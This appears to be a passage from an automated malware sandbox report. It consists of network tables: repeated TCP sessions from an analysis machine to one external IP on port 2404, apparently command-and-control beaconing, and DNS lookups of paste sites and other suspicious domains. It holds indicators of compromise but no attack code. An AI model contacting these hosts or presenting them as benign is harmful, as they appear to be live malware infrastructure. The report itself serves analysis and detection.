                                Oct 3, 2024 09:28:49.816745996 CEST240449739212.162.149.163192.168.2.6
                                Oct 3, 2024 09:28:51.312752008 CEST240449739212.162.149.163192.168.2.6
                                Oct 3, 2024 09:28:51.312962055 CEST497392404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:28:51.312962055 CEST497392404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:28:51.317861080 CEST240449739212.162.149.163192.168.2.6
                                Oct 3, 2024 09:28:52.321619034 CEST497402404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:28:52.326723099 CEST240449740212.162.149.163192.168.2.6
                                Oct 3, 2024 09:28:52.326814890 CEST497402404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:28:52.327187061 CEST497402404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:28:52.332014084 CEST240449740212.162.149.163192.168.2.6
                                Oct 3, 2024 09:28:53.793616056 CEST240449740212.162.149.163192.168.2.6
                                Oct 3, 2024 09:28:53.793688059 CEST497402404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:28:53.793735981 CEST497402404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:28:53.802285910 CEST240449740212.162.149.163192.168.2.6
                                Oct 3, 2024 09:28:54.806118011 CEST497412404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:28:54.811232090 CEST240449741212.162.149.163192.168.2.6
                                Oct 3, 2024 09:28:54.811336040 CEST497412404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:28:54.811709881 CEST497412404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:28:54.816545010 CEST240449741212.162.149.163192.168.2.6
                                Oct 3, 2024 09:28:56.314996004 CEST240449741212.162.149.163192.168.2.6
                                Oct 3, 2024 09:28:56.315129995 CEST497412404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:28:56.315176964 CEST497412404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:28:56.319987059 CEST240449741212.162.149.163192.168.2.6
                                Oct 3, 2024 09:28:57.321887016 CEST497432404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:28:57.327008963 CEST240449743212.162.149.163192.168.2.6
                                Oct 3, 2024 09:28:57.327100039 CEST497432404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:28:57.327487946 CEST497432404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:28:57.332289934 CEST240449743212.162.149.163192.168.2.6
                                Oct 3, 2024 09:28:58.805047989 CEST240449743212.162.149.163192.168.2.6
                                Oct 3, 2024 09:28:58.805154085 CEST497432404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:28:58.805236101 CEST497432404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:28:58.809967041 CEST240449743212.162.149.163192.168.2.6
                                Oct 3, 2024 09:28:59.815257072 CEST497442404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:28:59.820178032 CEST240449744212.162.149.163192.168.2.6
                                Oct 3, 2024 09:28:59.820257902 CEST497442404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:28:59.820733070 CEST497442404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:28:59.825536013 CEST240449744212.162.149.163192.168.2.6
                                Oct 3, 2024 09:29:01.345846891 CEST240449744212.162.149.163192.168.2.6
                                Oct 3, 2024 09:29:01.345922947 CEST497442404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:29:01.345962048 CEST497442404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:29:01.351175070 CEST240449744212.162.149.163192.168.2.6
                                Oct 3, 2024 09:29:02.352811098 CEST497452404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:29:02.358827114 CEST240449745212.162.149.163192.168.2.6
                                Oct 3, 2024 09:29:02.358987093 CEST497452404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:29:02.359457016 CEST497452404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:29:02.366189003 CEST240449745212.162.149.163192.168.2.6
                                Oct 3, 2024 09:29:03.837276936 CEST240449745212.162.149.163192.168.2.6
                                Oct 3, 2024 09:29:03.837353945 CEST497452404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:29:03.837402105 CEST497452404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:29:03.842257977 CEST240449745212.162.149.163192.168.2.6
                                Oct 3, 2024 09:29:04.852765083 CEST497462404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:29:05.059768915 CEST240449746212.162.149.163192.168.2.6
                                Oct 3, 2024 09:29:05.059855938 CEST497462404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:29:05.060313940 CEST497462404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:29:05.065129042 CEST240449746212.162.149.163192.168.2.6
                                Oct 3, 2024 09:29:06.506722927 CEST240449746212.162.149.163192.168.2.6
                                Oct 3, 2024 09:29:06.506869078 CEST497462404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:29:06.507081032 CEST497462404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:29:06.511807919 CEST240449746212.162.149.163192.168.2.6
                                Oct 3, 2024 09:29:07.509558916 CEST497472404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:29:07.514487028 CEST240449747212.162.149.163192.168.2.6
                                Oct 3, 2024 09:29:07.514564037 CEST497472404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:29:07.515007973 CEST497472404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:29:07.519789934 CEST240449747212.162.149.163192.168.2.6
                                Oct 3, 2024 09:29:08.974787951 CEST240449747212.162.149.163192.168.2.6
                                Oct 3, 2024 09:29:08.978317976 CEST497472404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:29:08.978357077 CEST497472404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:29:08.983300924 CEST240449747212.162.149.163192.168.2.6
                                Oct 3, 2024 09:29:09.993755102 CEST497482404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:29:09.999706030 CEST240449748212.162.149.163192.168.2.6
                                Oct 3, 2024 09:29:09.999809980 CEST497482404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:29:10.000253916 CEST497482404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:29:10.006433964 CEST240449748212.162.149.163192.168.2.6
                                Oct 3, 2024 09:29:11.460206985 CEST240449748212.162.149.163192.168.2.6
                                Oct 3, 2024 09:29:11.460347891 CEST497482404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:29:11.460349083 CEST497482404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:29:11.465213060 CEST240449748212.162.149.163192.168.2.6
                                Oct 3, 2024 09:29:12.464781046 CEST497492404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:29:12.471335888 CEST240449749212.162.149.163192.168.2.6
                                Oct 3, 2024 09:29:12.471405983 CEST497492404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:29:12.471873999 CEST497492404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:29:12.478239059 CEST240449749212.162.149.163192.168.2.6
                                Oct 3, 2024 09:29:13.928100109 CEST240449749212.162.149.163192.168.2.6
                                Oct 3, 2024 09:29:13.928239107 CEST497492404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:29:13.928260088 CEST497492404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:29:13.933093071 CEST240449749212.162.149.163192.168.2.6
                                Oct 3, 2024 09:29:14.930980921 CEST497502404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:29:14.935940027 CEST240449750212.162.149.163192.168.2.6
                                Oct 3, 2024 09:29:14.936064959 CEST497502404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:29:14.936734915 CEST497502404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:29:14.941534996 CEST240449750212.162.149.163192.168.2.6
                                Oct 3, 2024 09:29:16.397460938 CEST240449750212.162.149.163192.168.2.6
                                Oct 3, 2024 09:29:16.397867918 CEST497502404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:29:16.397867918 CEST497502404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:29:16.403067112 CEST240449750212.162.149.163192.168.2.6
                                Oct 3, 2024 09:29:17.401936054 CEST497512404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:29:17.406893015 CEST240449751212.162.149.163192.168.2.6
                                Oct 3, 2024 09:29:17.407016993 CEST497512404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:29:17.407501936 CEST497512404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:29:17.412322998 CEST240449751212.162.149.163192.168.2.6
                                Oct 3, 2024 09:29:19.072071075 CEST240449751212.162.149.163192.168.2.6
                                Oct 3, 2024 09:29:19.072143078 CEST497512404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:29:19.072244883 CEST497512404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:29:19.081413031 CEST240449751212.162.149.163192.168.2.6
                                Oct 3, 2024 09:29:20.087156057 CEST497532404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:29:20.092029095 CEST240449753212.162.149.163192.168.2.6
                                Oct 3, 2024 09:29:20.092123985 CEST497532404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:29:20.092592001 CEST497532404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:29:20.097333908 CEST240449753212.162.149.163192.168.2.6
                                Oct 3, 2024 09:29:21.596678972 CEST240449753212.162.149.163192.168.2.6
                                Oct 3, 2024 09:29:21.596812963 CEST497532404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:29:21.600440979 CEST497532404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:29:21.605365038 CEST240449753212.162.149.163192.168.2.6
                                Oct 3, 2024 09:29:22.640800953 CEST497542404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:29:22.826675892 CEST240449754212.162.149.163192.168.2.6
                                Oct 3, 2024 09:29:22.826772928 CEST497542404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:29:22.827305079 CEST497542404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:29:22.832192898 CEST240449754212.162.149.163192.168.2.6
                                Oct 3, 2024 09:29:24.311588049 CEST240449754212.162.149.163192.168.2.6
                                Oct 3, 2024 09:29:24.311752081 CEST497542404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:29:24.314429045 CEST497542404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:29:24.319231987 CEST240449754212.162.149.163192.168.2.6
                                Oct 3, 2024 09:29:25.338396072 CEST497552404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:29:25.343420029 CEST240449755212.162.149.163192.168.2.6
                                Oct 3, 2024 09:29:25.343542099 CEST497552404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:29:25.344002008 CEST497552404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:29:25.348766088 CEST240449755212.162.149.163192.168.2.6
                                Oct 3, 2024 09:29:26.825653076 CEST240449755212.162.149.163192.168.2.6
                                Oct 3, 2024 09:29:26.825773954 CEST497552404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:29:26.825887918 CEST497552404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:29:26.830696106 CEST240449755212.162.149.163192.168.2.6
                                Oct 3, 2024 09:29:27.837151051 CEST497562404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:29:27.842506886 CEST240449756212.162.149.163192.168.2.6
                                Oct 3, 2024 09:29:27.842612982 CEST497562404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:29:27.843036890 CEST497562404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:29:27.847948074 CEST240449756212.162.149.163192.168.2.6
                                Oct 3, 2024 09:29:29.307919979 CEST240449756212.162.149.163192.168.2.6
                                Oct 3, 2024 09:29:29.311247110 CEST497562404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:29:29.311300993 CEST497562404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:29:29.316095114 CEST240449756212.162.149.163192.168.2.6
                                Oct 3, 2024 09:29:30.321480989 CEST497572404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:29:30.326467991 CEST240449757212.162.149.163192.168.2.6
                                Oct 3, 2024 09:29:30.326546907 CEST497572404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:29:30.326917887 CEST497572404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:29:30.331720114 CEST240449757212.162.149.163192.168.2.6
                                Oct 3, 2024 09:29:31.812305927 CEST240449757212.162.149.163192.168.2.6
                                Oct 3, 2024 09:29:31.812510967 CEST497572404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:29:31.812510967 CEST497572404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:29:31.817519903 CEST240449757212.162.149.163192.168.2.6
                                Oct 3, 2024 09:29:32.821536064 CEST497582404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:29:32.826545000 CEST240449758212.162.149.163192.168.2.6
                                Oct 3, 2024 09:29:32.828406096 CEST497582404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:29:32.828638077 CEST497582404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:29:32.833453894 CEST240449758212.162.149.163192.168.2.6
                                Oct 3, 2024 09:29:34.271598101 CEST240449758212.162.149.163192.168.2.6
                                Oct 3, 2024 09:29:34.271743059 CEST497582404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:29:34.271743059 CEST497582404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:29:34.276576042 CEST240449758212.162.149.163192.168.2.6
                                Oct 3, 2024 09:29:35.274669886 CEST497592404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:29:35.279691935 CEST240449759212.162.149.163192.168.2.6
                                Oct 3, 2024 09:29:35.279779911 CEST497592404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:29:35.280034065 CEST497592404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:29:35.285080910 CEST240449759212.162.149.163192.168.2.6
                                Oct 3, 2024 09:29:36.777923107 CEST240449759212.162.149.163192.168.2.6
                                Oct 3, 2024 09:29:36.778043032 CEST497592404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:29:36.778079033 CEST497592404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:29:36.782989979 CEST240449759212.162.149.163192.168.2.6
                                Oct 3, 2024 09:29:37.790890932 CEST497602404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:29:37.796050072 CEST240449760212.162.149.163192.168.2.6
                                Oct 3, 2024 09:29:37.798418999 CEST497602404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:29:37.799854040 CEST497602404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:29:37.804737091 CEST240449760212.162.149.163192.168.2.6
                                Oct 3, 2024 09:29:39.278219938 CEST240449760212.162.149.163192.168.2.6
                                Oct 3, 2024 09:29:39.278312922 CEST497602404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:29:39.278314114 CEST497602404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:29:39.284480095 CEST240449760212.162.149.163192.168.2.6
                                Oct 3, 2024 09:29:40.290293932 CEST497612404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:29:40.301211119 CEST240449761212.162.149.163192.168.2.6
                                Oct 3, 2024 09:29:40.301582098 CEST497612404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:29:40.301582098 CEST497612404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:29:40.310427904 CEST240449761212.162.149.163192.168.2.6
                                Oct 3, 2024 09:29:41.799120903 CEST240449761212.162.149.163192.168.2.6
                                Oct 3, 2024 09:29:41.799194098 CEST497612404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:29:41.799263954 CEST497612404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:29:41.804441929 CEST240449761212.162.149.163192.168.2.6
                                Oct 3, 2024 09:29:42.807292938 CEST497622404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:29:42.814102888 CEST240449762212.162.149.163192.168.2.6
                                Oct 3, 2024 09:29:42.814222097 CEST497622404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:29:42.814455032 CEST497622404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:29:42.820506096 CEST240449762212.162.149.163192.168.2.6
                                Oct 3, 2024 09:29:44.343194962 CEST240449762212.162.149.163192.168.2.6
                                Oct 3, 2024 09:29:44.343383074 CEST497622404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:29:44.343383074 CEST497622404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:29:44.349940062 CEST240449762212.162.149.163192.168.2.6
                                Oct 3, 2024 09:29:45.352782965 CEST497632404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:29:45.358025074 CEST240449763212.162.149.163192.168.2.6
                                Oct 3, 2024 09:29:45.358129025 CEST497632404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:29:45.358366013 CEST497632404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:29:45.363734007 CEST240449763212.162.149.163192.168.2.6
                                Oct 3, 2024 09:29:46.836972952 CEST240449763212.162.149.163192.168.2.6
                                Oct 3, 2024 09:29:46.837069035 CEST497632404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:29:46.837112904 CEST497632404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:29:46.842207909 CEST240449763212.162.149.163192.168.2.6
                                Oct 3, 2024 09:29:47.805905104 CEST497642404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:29:47.811441898 CEST240449764212.162.149.163192.168.2.6
                                Oct 3, 2024 09:29:47.811517954 CEST497642404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:29:47.811789989 CEST497642404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:29:47.818888903 CEST240449764212.162.149.163192.168.2.6
                                Oct 3, 2024 09:29:49.328649044 CEST240449764212.162.149.163192.168.2.6
                                Oct 3, 2024 09:29:49.328718901 CEST497642404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:29:49.328815937 CEST497642404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:29:49.334047079 CEST240449764212.162.149.163192.168.2.6
                                Oct 3, 2024 09:29:50.274595022 CEST497652404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:29:50.284570932 CEST240449765212.162.149.163192.168.2.6
                                Oct 3, 2024 09:29:50.284657001 CEST497652404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:29:50.284883022 CEST497652404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:29:50.297332048 CEST240449765212.162.149.163192.168.2.6
                                Oct 3, 2024 09:29:51.799197912 CEST240449765212.162.149.163192.168.2.6
                                Oct 3, 2024 09:29:51.799313068 CEST497652404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:29:51.799354076 CEST497652404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:29:51.805605888 CEST240449765212.162.149.163192.168.2.6
                                Oct 3, 2024 09:29:52.712260008 CEST497662404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:29:52.717506886 CEST240449766212.162.149.163192.168.2.6
                                Oct 3, 2024 09:29:52.720412970 CEST497662404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:29:52.720676899 CEST497662404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:29:52.726290941 CEST240449766212.162.149.163192.168.2.6
                                Oct 3, 2024 09:29:54.201515913 CEST240449766212.162.149.163192.168.2.6
                                Oct 3, 2024 09:29:54.201596975 CEST497662404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:29:54.201643944 CEST497662404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:29:54.212065935 CEST240449766212.162.149.163192.168.2.6
                                Oct 3, 2024 09:29:55.087141037 CEST497672404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:29:55.092178106 CEST240449767212.162.149.163192.168.2.6
                                Oct 3, 2024 09:29:55.092262030 CEST497672404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:29:55.092566013 CEST497672404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:29:55.097520113 CEST240449767212.162.149.163192.168.2.6
                                Oct 3, 2024 09:29:56.563097000 CEST240449767212.162.149.163192.168.2.6
                                Oct 3, 2024 09:29:56.563153982 CEST497672404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:29:56.563191891 CEST497672404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:29:56.568073034 CEST240449767212.162.149.163192.168.2.6
                                Oct 3, 2024 09:29:57.415307045 CEST497692404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:29:57.420327902 CEST240449769212.162.149.163192.168.2.6
                                Oct 3, 2024 09:29:57.420562983 CEST497692404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:29:57.420650005 CEST497692404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:29:57.425822020 CEST240449769212.162.149.163192.168.2.6
                                Oct 3, 2024 09:29:59.079514027 CEST240449769212.162.149.163192.168.2.6
                                Oct 3, 2024 09:29:59.079750061 CEST497692404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:29:59.079750061 CEST497692404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:29:59.093332052 CEST240449769212.162.149.163192.168.2.6
                                Oct 3, 2024 09:29:59.899815083 CEST497702404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:29:59.921925068 CEST240449770212.162.149.163192.168.2.6
                                Oct 3, 2024 09:29:59.923022985 CEST497702404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:29:59.923537970 CEST497702404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:29:59.942706108 CEST240449770212.162.149.163192.168.2.6
                                Oct 3, 2024 09:30:01.522186041 CEST240449770212.162.149.163192.168.2.6
                                Oct 3, 2024 09:30:01.522357941 CEST497702404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:30:01.522411108 CEST497702404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:30:01.527508974 CEST240449770212.162.149.163192.168.2.6
                                Oct 3, 2024 09:30:02.322766066 CEST497712404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:30:02.329962015 CEST240449771212.162.149.163192.168.2.6
                                Oct 3, 2024 09:30:02.330092907 CEST497712404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:30:02.330483913 CEST497712404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:30:02.335933924 CEST240449771212.162.149.163192.168.2.6
                                Oct 3, 2024 09:30:03.839222908 CEST240449771212.162.149.163192.168.2.6
                                Oct 3, 2024 09:30:03.839287996 CEST497712404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:30:03.839330912 CEST497712404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:30:03.845767975 CEST240449771212.162.149.163192.168.2.6
                                Oct 3, 2024 09:30:04.602873087 CEST497722404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:30:04.608091116 CEST240449772212.162.149.163192.168.2.6
                                Oct 3, 2024 09:30:04.608187914 CEST497722404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:30:04.608519077 CEST497722404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:30:04.613842964 CEST240449772212.162.149.163192.168.2.6
                                Oct 3, 2024 09:30:06.088255882 CEST240449772212.162.149.163192.168.2.6
                                Oct 3, 2024 09:30:06.088340044 CEST497722404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:30:06.088428974 CEST497722404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:30:06.093138933 CEST240449772212.162.149.163192.168.2.6
                                Oct 3, 2024 09:30:06.837255955 CEST497732404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:30:06.842341900 CEST240449773212.162.149.163192.168.2.6
                                Oct 3, 2024 09:30:06.843293905 CEST497732404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:30:06.843533039 CEST497732404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:30:06.848634958 CEST240449773212.162.149.163192.168.2.6
                                Oct 3, 2024 09:30:08.326358080 CEST240449773212.162.149.163192.168.2.6
                                Oct 3, 2024 09:30:08.326507092 CEST497732404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:30:08.353390932 CEST497732404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:30:08.358315945 CEST240449773212.162.149.163192.168.2.6
                                Oct 3, 2024 09:30:09.071636915 CEST497742404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:30:09.076855898 CEST240449774212.162.149.163192.168.2.6
                                Oct 3, 2024 09:30:09.080436945 CEST497742404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:30:09.080687046 CEST497742404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:30:09.446202993 CEST497742404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:30:10.125539064 CEST240449774212.162.149.163192.168.2.6
                                Oct 3, 2024 09:30:10.125603914 CEST497742404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:30:10.126512051 CEST240449774212.162.149.163192.168.2.6
                                Oct 3, 2024 09:30:10.126584053 CEST240449774212.162.149.163192.168.2.6
                                Oct 3, 2024 09:30:11.715136051 CEST240449774212.162.149.163192.168.2.6
                                Oct 3, 2024 09:30:11.715353966 CEST497742404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:30:11.715353966 CEST497742404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:30:12.415409088 CEST497752404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:30:12.741913080 CEST497742404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:30:12.760252953 CEST240449774212.162.149.163192.168.2.6
                                Oct 3, 2024 09:30:12.760307074 CEST497742404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:30:12.760391951 CEST240449774212.162.149.163192.168.2.6
                                Oct 3, 2024 09:30:12.760433912 CEST497742404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:30:12.760502100 CEST240449774212.162.149.163192.168.2.6
                                Oct 3, 2024 09:30:12.760541916 CEST497742404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:30:12.762226105 CEST240449774212.162.149.163192.168.2.6
                                Oct 3, 2024 09:30:12.762243032 CEST240449775212.162.149.163192.168.2.6
                                Oct 3, 2024 09:30:12.762274981 CEST240449774212.162.149.163192.168.2.6
                                Oct 3, 2024 09:30:12.762322903 CEST497752404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:30:12.762358904 CEST497742404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:30:12.762607098 CEST497752404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:30:12.770200014 CEST240449775212.162.149.163192.168.2.6
                                Oct 3, 2024 09:30:14.263031006 CEST240449775212.162.149.163192.168.2.6
                                Oct 3, 2024 09:30:14.263109922 CEST497752404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:30:14.620532990 CEST497752404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:30:14.625551939 CEST240449775212.162.149.163192.168.2.6
                                Oct 3, 2024 09:30:15.634557962 CEST497762404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:30:15.639872074 CEST240449776212.162.149.163192.168.2.6
                                Oct 3, 2024 09:30:15.640032053 CEST497762404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:30:15.640290976 CEST497762404192.168.2.6212.162.149.163
                                Oct 3, 2024 09:30:15.645266056 CEST240449776212.162.149.163192.168.2.6

                                UDP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Oct 3, 2024 09:28:08.304816008 CEST5726453192.168.2.61.1.1.1
                                Oct 3, 2024 09:28:08.885384083 CEST53572641.1.1.1192.168.2.6
                                Oct 3, 2024 09:28:11.600537062 CEST5484353192.168.2.61.1.1.1
                                Oct 3, 2024 09:28:11.607836962 CEST53548431.1.1.1192.168.2.6
                                Oct 3, 2024 09:28:18.657073021 CEST5706353192.168.2.61.1.1.1
                                Oct 3, 2024 09:28:18.948904037 CEST53570631.1.1.1192.168.2.6
                                Oct 3, 2024 09:28:23.388641119 CEST6352553192.168.2.61.1.1.1
                                Oct 3, 2024 09:28:23.395855904 CEST53635251.1.1.1192.168.2.6

                                DNS Queries

                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                Oct 3, 2024 09:28:08.304816008 CEST192.168.2.61.1.1.10xd9dfStandard query (0)ftp.desckvbrat.com.brA (IP address)IN (0x0001)false
                                Oct 3, 2024 09:28:11.600537062 CEST192.168.2.61.1.1.10x6f63Standard query (0)paste.eeA (IP address)IN (0x0001)false
                                Oct 3, 2024 09:28:18.657073021 CEST192.168.2.61.1.1.10x4bd9Standard query (0)www.gratitudeseekers.comA (IP address)IN (0x0001)false
                                Oct 3, 2024 09:28:23.388641119 CEST192.168.2.61.1.1.10xac6bStandard query (0)pastebin.comA (IP address)IN (0x0001)false

                                DNS Answers

                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                Oct 3, 2024 09:28:08.885384083 CEST1.1.1.1192.168.2.60xd9dfNo error (0)ftp.desckvbrat.com.brdesckvbrat.com.brCNAME (Canonical name)IN (0x0001)false
                                Oct 3, 2024 09:28:08.885384083 CEST1.1.1.1192.168.2.60xd9dfNo error (0)desckvbrat.com.br191.252.83.213A (IP address)IN (0x0001)false
                                Oct 3, 2024 09:28:11.607836962 CEST1.1.1.1192.168.2.60x6f63No error (0)paste.ee188.114.97.3A (IP address)IN (0x0001)false
                                Oct 3, 2024 09:28:11.607836962 CEST1.1.1.1192.168.2.60x6f63No error (0)paste.ee188.114.96.3A (IP address)IN (0x0001)false
                                Oct 3, 2024 09:28:18.948904037 CEST1.1.1.1192.168.2.60x4bd9No error (0)www.gratitudeseekers.comgratitudeseekers.comCNAME (Canonical name)IN (0x0001)false
